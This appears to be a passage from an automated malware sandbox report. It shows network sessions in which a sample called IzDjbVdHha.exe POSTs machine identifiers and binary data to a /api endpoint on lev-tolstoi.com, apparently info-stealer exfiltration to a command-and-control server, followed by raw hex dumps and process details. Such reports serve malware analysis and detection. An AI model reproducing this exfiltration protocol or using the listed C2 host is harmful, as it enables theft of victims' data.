2024-12-27 13:53:27 UTC	1123	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:53:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dkso1s4n3qa7nbcpl0dj6q8put; expires=Tue, 22 Apr 2025 07:40:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s7skEu8XKnlbBIjhx2RTxn%2FtPxi5hU5YRxoJewd8yFTDGL3fZTPE0TZI2TgMWbhh%2Fhkd7cunkgwAeeOdnC4Ufff9XCC7UaVQKZ4oXlrjAiIhWHF3sEgUY6SM6ZZBn4Cels0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89cc008968437a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=15437&min_rtt=1916&rtt_var=8896&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=973&delivery_rate=1524008&cwnd=223&unsent_bytes=0&cid=d000d6f7876b925f&ts=774&x=0"
2024-12-27 13:53:27 UTC	246	IN	Data Raw: 31 34 36 62 0d 0a 7a 35 34 4f 2b 32 47 57 44 31 63 43 48 42 37 6c 69 6e 35 35 68 32 64 66 7a 7a 38 77 71 7a 65 32 70 49 30 4a 53 43 45 63 75 71 57 30 76 48 6a 5a 57 36 49 6a 64 58 46 35 50 4e 2f 2b 44 41 7a 69 53 33 32 75 57 78 4b 52 55 64 66 49 2f 6d 78 6b 41 32 72 58 68 2f 58 34 62 35 63 53 38 79 4e 31 5a 32 51 38 33 39 45 46 57 2b 49 4a 66 66 55 64 56 63 46 56 31 38 6a 76 61 43 4e 4f 62 4e 62 47 70 2f 4a 70 6b 77 54 31 61 7a 5a 75 63 58 75 41 37 78 38 54 36 51 34 79 70 31 49 53 68 78 58 54 33 71 38 7a 61 6d 78 35 7a 73 53 43 2f 33 32 51 51 2b 73 6a 4c 43 42 35 63 4d 65 77 58 42 6a 69 42 54 4f 70 57 31 76 44 58 39 37 41 37 6d 30 69 55 58 58 63 7a 61 66 38 61 70 49 4f 2f 48 38 37 5a 48 5a 77 68 75 55 66 57 36 74 46 4f 72 55 64 Data Ascii: 146bz54O+2GWD1cCHB7lin55h2dfzz8wqze2pI0JSCEcuqW0vHjZW6IjdXF5PN/+DAziS32uWxKRUdfI/mxkA2rXh/X4b5cS8yN1Z2Q839EFW+IJffUdVcFV18jvaCNObNbGp/JpkwT1azZucXuA7x8T6Q4yp1IShxXT3q8zamx5zsSC/32QQ+sjLCB5cMewXBjiBTOpW1vDX97A7m0iUXXczaf8apIO/H87ZHZwhuUfW6tFOrUd
2024-12-27 13:53:27 UTC	1369	IN	Data Raw: 43 6f 6b 47 35 73 58 2b 65 6a 39 4f 62 74 36 48 73 72 4a 31 32 51 54 34 4c 57 30 67 64 6e 43 4a 37 52 38 55 34 67 51 39 76 31 4a 53 79 6c 33 63 77 75 56 6b 4a 55 78 77 30 73 43 6c 39 57 75 57 42 50 78 72 4f 6d 4d 2b 4d 73 66 76 42 46 75 39 52 52 32 39 58 6c 48 64 57 4d 57 47 38 43 55 7a 41 33 6e 55 68 2f 57 38 61 70 63 43 2b 57 30 6e 61 48 56 33 67 76 6f 58 45 75 67 49 50 61 42 58 58 63 70 56 30 38 7a 6c 5a 43 42 48 63 39 58 42 72 66 77 73 31 30 50 7a 64 58 55 34 50 6c 2b 43 2b 42 73 58 38 30 63 48 37 55 49 63 30 42 58 54 79 71 38 7a 61 6b 74 37 32 38 53 6d 38 32 2b 52 43 4f 5a 74 4a 32 5a 7a 65 5a 58 75 47 52 58 76 42 69 2b 6e 55 31 54 4b 58 4e 2f 50 36 6d 77 75 41 7a 43 59 77 4c 57 38 4e 4e 6b 69 2b 57 59 35 61 6d 6c 38 78 2f 64 53 41 71 55 43 4d 65 30 Data Ascii: CokG5sX+ej9Obt6HsrJ12QT4LW0gdnCJ7R8U4gQ9v1JSyl3cwuVkJUxw0sCl9WuWBPxrOmM+MsfvBFu9RR29XlHdWMWG8CUzA3nUh/W8apcC+W0naHV3gvoXEugIPaBXXcpV08zlZCBHc9XBrfws10PzdXU4Pl+C+BsX80cH7UIc0BXTyq8zakt728Sm82+RCOZtJ2ZzeZXuGRXvBi+nU1TKXN/P6mwuAzCYwLW8NNki+WY5aml8x/dSAqUCMe0
2024-12-27 13:53:27 UTC	1369	IN	Data Raw: 4e 69 47 6f 53 73 74 57 7a 36 41 68 34 66 2f 65 4a 6f 4a 74 6c 67 32 62 6e 42 37 6b 61 67 44 56 66 78 46 4f 71 45 64 43 6f 6c 59 31 63 37 70 65 53 56 4f 66 64 62 4a 6f 76 6c 6a 6b 51 50 30 59 44 42 6b 64 58 65 45 35 52 67 4a 37 77 55 31 71 46 78 59 77 78 57 61 68 75 68 7a 61 68 73 2b 36 64 43 6d 76 6c 6d 61 44 66 70 71 49 79 42 68 4d 70 36 6f 47 78 65 6c 58 58 32 67 56 56 66 4d 57 74 58 4d 34 57 34 67 54 33 62 57 78 4c 2f 7a 61 4a 6b 50 2f 47 63 34 62 6e 70 30 6a 75 4d 58 48 65 55 45 4e 2b 30 54 45 73 35 4e 6c 4a 36 76 58 79 31 50 63 39 65 46 6d 50 39 69 6c 77 54 69 4c 53 6f 75 5a 7a 79 41 35 46 78 44 70 51 6b 30 72 56 5a 59 7a 56 58 54 79 2b 70 6f 4c 55 42 7a 33 38 32 6a 2b 32 69 56 43 76 6c 72 4e 57 64 36 65 5a 58 74 46 52 66 70 52 58 50 74 57 6b 71 4a Data Ascii: NiGoSstWz6Ah4f/eJoJtlg2bnB7kagDVfxFOqEdColY1c7peSVOfdbJovljkQP0YDBkdXeE5RgJ7wU1qFxYwxWahuhzahs+6dCmvlmaDfpqIyBhMp6oGxelXX2gVVfMWtXM4W4gT3bWxL/zaJkP/Gc4bnp0juMXHeUEN+0TEs5NlJ6vXy1Pc9eFmP9ilwTiLSouZzyA5FxDpQk0rVZYzVXTy+poLUBz382j+2iVCvlrNWd6eZXtFRfpRXPtWkqJ
2024-12-27 13:53:27 UTC	1369	IN	Data Raw: 68 6e 61 68 73 2b 30 63 36 2f 38 6d 4b 51 44 76 4a 6c 4d 6d 35 7a 64 34 48 6a 47 78 7a 6a 43 44 57 67 57 46 48 49 55 64 37 55 37 47 41 67 54 6e 53 59 69 65 33 37 64 4e 6c 62 74 45 6f 35 53 57 35 6e 6c 66 35 63 42 4b 73 63 66 61 70 52 45 70 45 56 31 38 6e 6d 5a 43 4a 4c 63 64 66 44 6f 2f 70 71 6c 41 62 37 5a 79 64 6f 63 48 47 4d 35 78 63 4a 35 51 67 35 6f 56 6c 61 77 6c 2b 55 69 4b 39 73 4d 67 4d 6d 6d 50 4b 67 38 32 79 61 46 62 52 79 65 33 6b 2b 65 34 75 6f 52 46 76 70 43 7a 32 69 55 56 37 43 58 64 58 4b 34 57 77 76 53 6e 62 51 31 61 7a 34 5a 4a 67 4e 2b 32 77 78 5a 58 74 34 67 4f 77 61 46 4b 56 4c 66 61 70 46 45 70 45 56 2b 2b 48 61 4b 51 74 35 50 73 65 4a 74 4c 78 72 6c 55 4f 73 4c 54 6c 6a 63 6e 53 49 37 68 55 58 37 77 77 32 6f 56 5a 57 78 56 7a 52 77 Data Ascii: hnahs+0c6/8mKQDvJlMm5zd4HjGxzjCDWgWFHIUd7U7GAgTnSYie37dNlbtEo5SW5nlf5cBKscfapREpEV18nmZCJLcdfDo/pqlAb7ZydocHGM5xcJ5Qg5oVlawl+UiK9sMgMmmPKg82yaFbRye3k+e4uoRFvpCz2iUV7CXdXK4WwvSnbQ1az4ZJgN+2wxZXt4gOwaFKVLfapFEpEV++HaKQt5PseJtLxrlUOsLTljcnSI7hUX7ww2oVZWxVzRw
2024-12-27 13:53:27 UTC	882	IN	Data Raw: 46 62 4e 2f 4f 76 2f 4a 68 6c 67 76 38 5a 44 52 6b 65 33 47 42 35 42 59 61 34 67 73 7a 70 52 30 63 69 56 4c 4d 68 72 63 72 43 31 4e 6c 79 74 47 67 33 57 47 57 51 2b 73 6a 4c 43 42 35 63 4d 65 77 58 42 4c 33 41 54 43 2f 56 46 58 48 57 74 66 55 37 6d 59 68 55 58 6e 58 77 36 72 77 61 70 59 46 39 57 67 2f 62 48 6c 35 6a 4f 63 51 57 36 74 46 4f 72 55 64 43 6f 6c 37 33 39 58 34 61 43 52 49 61 4d 4f 48 73 72 4a 31 32 51 54 34 4c 57 30 67 66 58 65 4d 37 42 77 58 35 51 45 77 72 55 39 64 7a 6c 4c 64 7a 66 31 68 4c 55 52 31 30 4d 79 69 2b 6e 36 56 44 65 5a 6f 4a 33 49 2b 4d 73 66 76 42 46 75 39 52 51 75 71 54 55 4c 4b 46 2b 58 51 37 48 30 68 54 6e 4b 59 32 4f 50 6c 4c 4a 34 50 74 44 56 31 5a 6e 46 31 68 4f 63 64 45 75 6b 49 4f 4b 52 59 55 38 39 52 33 73 7a 76 62 53 Data Ascii: FbN/Ov/Jhlgv8ZDRke3GB5BYa4gszpR0ciVLMhrcrC1NlytGg3WGWQ+sjLCB5cMewXBL3ATC/VFXHWtfU7mYhUXnXw6rwapYF9Wg/bHl5jOcQW6tFOrUdCol739X4aCRIaMOHsrJ12QT4LW0gfXeM7BwX5QEwrU9dzlLdzf1hLUR10Myi+n6VDeZoJ3I+MsfvBFu9RQuqTULKF+XQ7H0hTnKY2OPlLJ4PtDV1ZnF1hOcdEukIOKRYU89R3szvbS
2024-12-27 13:53:27 UTC	1369	IN	Data Raw: 33 39 36 39 0d 0a 46 49 75 4e 45 45 73 35 5a 6c 4a 36 76 5a 53 64 46 66 39 6e 50 70 66 78 71 6b 77 66 33 5a 44 5a 6e 64 33 71 4d 36 78 59 55 34 67 4d 35 72 56 5a 56 78 31 50 52 7a 65 59 72 5a 41 4e 35 77 49 66 31 76 45 71 36 45 65 5a 66 4f 32 4e 6c 50 4a 69 6d 42 56 76 69 43 58 33 31 48 56 6e 42 57 73 62 44 35 6d 4d 75 53 6e 37 63 7a 61 44 37 62 4a 77 4f 38 57 6b 37 5a 48 6c 38 69 2b 63 62 45 2b 6f 42 50 61 49 64 48 49 6c 53 7a 49 61 33 4b 77 70 49 61 50 6e 4a 70 75 34 73 68 6b 33 74 4c 54 4a 73 50 69 54 48 35 68 55 61 37 51 73 78 70 56 6c 41 79 56 37 64 79 65 35 6b 4b 6b 42 2f 30 73 2b 2f 2b 6d 79 53 43 2f 4e 6c 4d 57 35 73 66 59 69 6f 55 6c 76 69 48 58 33 31 48 57 50 66 55 74 50 4a 72 55 49 74 57 48 2f 53 78 4b 62 77 4c 49 5a 4e 37 53 30 79 62 44 34 6b Data Ascii: 3969FIuNEEs5ZlJ6vZSdFf9nPpfxqkwf3ZDZnd3qM6xYU4gM5rVZVx1PRzeYrZAN5wIf1vEq6EeZfO2NlPJimBVviCX31HVnBWsbD5mMuSn7czaD7bJwO8Wk7ZHl8i+cbE+oBPaIdHIlSzIa3KwpIaPnJpu4shk3tLTJsPiTH5hUa7QsxpVlAyV7dye5kKkB/0s+/+mySC/NlMW5sfYioUlviHX31HWPfUtPJrUItWH/SxKbwLIZN7S0ybD4k
2024-12-27 13:53:27 UTC	1369	IN	Data Raw: 7a 36 53 79 54 74 57 6c 36 4a 44 5a 54 4e 34 57 34 72 54 33 54 66 79 62 2f 39 5a 70 55 43 38 32 6f 2b 63 6e 56 75 6a 4f 41 66 46 65 30 4d 50 61 4e 64 55 38 52 56 6c 49 69 76 62 44 49 44 4a 70 6a 69 6a 75 74 36 6b 30 48 58 65 69 4e 71 65 58 43 52 34 78 30 59 38 77 67 74 37 52 4d 53 32 46 4c 46 68 72 64 39 4f 6c 52 35 78 34 6d 30 76 47 75 56 51 36 77 74 50 6d 39 77 63 59 7a 73 46 52 37 74 42 6a 69 6f 56 31 37 46 56 4e 7a 50 35 57 34 76 52 58 54 62 79 61 4c 39 59 4a 30 4b 2b 6d 52 31 4c 6a 35 37 6e 36 68 45 57 39 4d 56 4f 72 56 51 51 6f 74 6e 31 39 66 2b 66 69 64 54 65 4a 72 6f 72 76 42 76 6e 41 54 6b 4c 53 6f 75 5a 7a 79 41 35 46 78 44 70 51 55 35 6f 56 35 56 78 31 72 5a 79 65 68 67 4a 55 6c 77 79 73 69 6f 39 47 43 52 44 75 5a 6e 50 33 4a 33 64 59 72 6d 46 Data Ascii: z6SyTtWl6JDZTN4W4rT3Tfyb/9ZpUC82o+cnVujOAfFe0MPaNdU8RVlIivbDIDJpjijut6k0HXeiNqeXCR4x0Y8wgt7RMS2FLFhrd9OlR5x4m0vGuVQ6wtPm9wcYzsFR7tBjioV17FVNzP5W4vRXTbyaL9YJ0K+mR1Lj57n6hEW9MVOrVQQotn19f+fidTeJrorvBvnATkLSouZzyA5FxDpQU5oV5Vx1rZyehgJUlwysio9GCRDuZnP3J3dYrmF
2024-12-27 13:53:27 UTC	1369	IN	Data Raw: 36 72 6b 39 41 7a 31 62 43 78 61 68 56 46 47 4e 31 7a 73 61 67 39 32 43 6e 50 65 46 75 4f 32 35 35 61 70 61 6f 55 6c 76 71 52 57 57 55 48 52 71 4a 61 70 71 47 39 79 74 79 41 30 76 62 79 61 50 37 65 6f 68 4f 31 47 59 6a 59 58 4e 33 69 36 6f 64 46 76 55 43 66 65 4d 64 56 49 6b 4e 68 49 69 76 62 7a 73 44 4a 6f 69 56 39 71 6b 2f 7a 6c 4f 6d 63 6e 74 35 50 6d 72 48 73 45 35 56 70 52 64 39 39 52 30 56 79 6b 66 47 77 4f 78 39 4b 51 52 41 35 75 65 6d 38 47 2b 56 41 76 4d 74 65 79 42 78 50 4e 2f 52 58 42 6a 33 46 33 4b 38 53 31 2f 5a 55 70 6a 4f 2f 6d 59 6d 41 7a 43 59 69 36 6e 33 59 4a 77 45 35 43 49 6e 63 48 56 77 6b 61 51 59 43 61 56 4c 66 62 78 57 58 64 74 62 30 34 6e 2b 66 53 64 54 66 64 33 41 34 66 52 39 6c 41 2b 30 49 33 56 31 64 58 43 42 35 51 6c 55 39 42 Data Ascii: 6rk9Az1bCxahVFGN1zsag92CnPeFuO255apaoUlvqRWWUHRqJapqG9ytyA0vbyaP7eohO1GYjYXN3i6odFvUCfeMdVIkNhIivbzsDJoiV9qk/zlOmcnt5PmrHsE5VpRd99R0VykfGwOx9KQRA5uem8G+VAvMteyBxPN/RXBj3F3K8S1/ZUpjO/mYmAzCYi6n3YJwE5CIncHVwkaQYCaVLfbxWXdtb04n+fSdTfd3A4fR9lA+0I3V1dXCB5QlU9B
2024-12-27 13:53:27 UTC	1369	IN	Data Raw: 51 63 64 65 77 73 47 76 56 47 51 44 5a 70 69 66 37 63 6c 76 6c 77 33 7a 65 79 51 74 57 48 2b 41 37 68 38 56 38 68 52 39 34 78 31 55 69 51 32 47 69 4b 39 76 4f 77 4d 6d 69 4a 58 32 71 54 2f 4f 55 36 5a 79 65 33 6b 2b 61 73 65 77 54 31 57 6c 46 33 33 31 48 52 58 48 57 4e 58 46 34 57 67 34 55 58 6a 62 30 61 36 37 55 71 63 6d 2b 57 41 77 62 6e 6c 43 75 63 6b 57 43 2b 67 4b 4f 70 4e 6a 5a 64 68 53 78 49 54 4a 61 44 78 41 50 70 61 48 74 62 77 30 32 53 4c 2b 66 54 68 76 65 54 7a 4a 71 42 68 62 76 55 55 59 6f 46 42 58 78 31 4b 57 35 2b 56 37 4a 30 78 35 6d 49 6e 74 38 43 7a 42 51 2f 56 6e 4a 57 31 78 65 38 76 76 42 68 79 6c 53 33 32 6a 48 51 71 4a 56 4e 37 57 34 6d 51 74 44 33 6a 57 79 65 33 6a 49 6f 42 44 34 69 31 74 4d 7a 41 38 6c 61 68 45 57 36 49 4c 4d 4b 78 Data Ascii: QcdewsGvVGQDZpif7clvlw3zeyQtWH+A7h8V8hR94x1UiQ2GiK9vOwMmiJX2qT/OU6Zye3k+asewT1WlF331HRXHWNXF4Wg4UXjb0a67Uqcm+WAwbnlCuckWC+gKOpNjZdhSxITJaDxAPpaHtbw02SL+fThveTzJqBhbvUUYoFBXx1KW5+V7J0x5mInt8CzBQ/VnJW1xe8vvBhylS32jHQqJVN7W4mQtD3jWye3jIoBD4i1tMzA8lahEW6ILMKx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49754	172.67.157.254	443	4344	C:\Users\user\Desktop\IzDjbVdHha.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:53:30 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BYU3IODR3WM2QU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12830 Host: lev-tolstoi.com
2024-12-27 13:53:30 UTC	12830	OUT	Data Raw: 2d 2d 42 59 55 33 49 4f 44 52 33 57 4d 32 51 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 32 43 44 41 30 39 30 33 33 35 44 36 38 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 59 55 33 49 4f 44 52 33 57 4d 32 51 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 59 55 33 49 4f 44 52 33 57 4d 32 51 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 42 59 55 33 49 4f 44 52 33 57 4d 32 51 Data Ascii: --BYU3IODR3WM2QUContent-Disposition: form-data; name="hwid"AD2CDA090335D68DAC8923850305D13E--BYU3IODR3WM2QUContent-Disposition: form-data; name="pid"2--BYU3IODR3WM2QUContent-Disposition: form-data; name="lid"4h5VfH----BYU3IODR3WM2Q
2024-12-27 13:53:31 UTC	1120	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:53:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=96aq6npqusrm92k7s5loknt73f; expires=Tue, 22 Apr 2025 07:40:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SbybCbqf2sqCGKaSGWRjzhFnz0htpO4Tlm0VnCzvBbVHmxPplTTSnuBdMU0ocbk0UpSul5enAUfWtUGB0iDGElCK1DYem4zmrXYGQhI6lXP5mh58FYWGqTNNg29CoIQTJSo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89cc14b8c5191e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1488&rtt_var=564&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13765&delivery_rate=1929940&cwnd=238&unsent_bytes=0&cid=0888b99225f53a39&ts=957&x=0"
2024-12-27 13:53:31 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 13:53:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49766	172.67.157.254	443	4344	C:\Users\user\Desktop\IzDjbVdHha.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:53:33 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=EQIPKNMVI4UE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15064 Host: lev-tolstoi.com
2024-12-27 13:53:33 UTC	15064	OUT	Data Raw: 2d 2d 45 51 49 50 4b 4e 4d 56 49 34 55 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 32 43 44 41 30 39 30 33 33 35 44 36 38 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 51 49 50 4b 4e 4d 56 49 34 55 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 51 49 50 4b 4e 4d 56 49 34 55 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 45 51 49 50 4b 4e 4d 56 49 34 55 45 0d 0a 43 6f 6e 74 65 Data Ascii: --EQIPKNMVI4UEContent-Disposition: form-data; name="hwid"AD2CDA090335D68DAC8923850305D13E--EQIPKNMVI4UEContent-Disposition: form-data; name="pid"2--EQIPKNMVI4UEContent-Disposition: form-data; name="lid"4h5VfH----EQIPKNMVI4UEConte
2024-12-27 13:53:34 UTC	1136	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:53:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=570mubkfjepv9i72k8m4s3num7; expires=Tue, 22 Apr 2025 07:40:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2BuhMTrly%2BW50WVMIE0iePBXnx9i0fMAo%2FCOprvQIbgL4LlOqx4DiFSijRyGp2U9x%2BCbcLrHNjD3JSiR%2F1MuOMVv2Ds%2FJ57%2FSX9KI36FQvDBCCZy6q2cFwl4LKgJyy2SkkU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89cc27882f43df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3309&min_rtt=1756&rtt_var=1765&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15997&delivery_rate=1662870&cwnd=243&unsent_bytes=0&cid=95e852d268586dc4&ts=850&x=0"
2024-12-27 13:53:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 13:53:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49775	172.67.157.254	443	4344	C:\Users\user\Desktop\IzDjbVdHha.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:53:36 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ODJUR9FC501SN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19928 Host: lev-tolstoi.com
2024-12-27 13:53:36 UTC	15331	OUT	Data Raw: 2d 2d 4f 44 4a 55 52 39 46 43 35 30 31 53 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 32 43 44 41 30 39 30 33 33 35 44 36 38 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 44 4a 55 52 39 46 43 35 30 31 53 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4f 44 4a 55 52 39 46 43 35 30 31 53 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4f 44 4a 55 52 39 46 43 35 30 31 53 4e 0d 0a 43 Data Ascii: --ODJUR9FC501SNContent-Disposition: form-data; name="hwid"AD2CDA090335D68DAC8923850305D13E--ODJUR9FC501SNContent-Disposition: form-data; name="pid"3--ODJUR9FC501SNContent-Disposition: form-data; name="lid"4h5VfH----ODJUR9FC501SNC
2024-12-27 13:53:36 UTC	4597	OUT	Data Raw: 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2024-12-27 13:53:37 UTC	1133	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:53:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9c2dvfp82ermbihtm6634ckmui; expires=Tue, 22 Apr 2025 07:40:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtPRRmeJO0PLJbtVk7YE6nG41XBuI9RJkmFxY6r9tw6TEhZtZNo%2FV%2BP7fEwUvVdHv9qOq0ce1UXYL6%2FV5wSerR%2BYlAO%2BkLwyNDHPSuU43kgzYZrt%2B5CbtRTYeJuqGDrG7Ns%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89cc3ba853de92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1512&min_rtt=1512&rtt_var=567&sent=16&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=20884&delivery_rate=1931216&cwnd=245&unsent_bytes=0&cid=bbe74319a302a045&ts=968&x=0"
2024-12-27 13:53:37 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 13:53:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	08:53:11
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\IzDjbVdHha.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IzDjbVdHha.exe"
Imagebase:	0x400000
File size:	356'352 bytes
MD5 hash:	B740DD94027C29D447F10E96C3E361EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
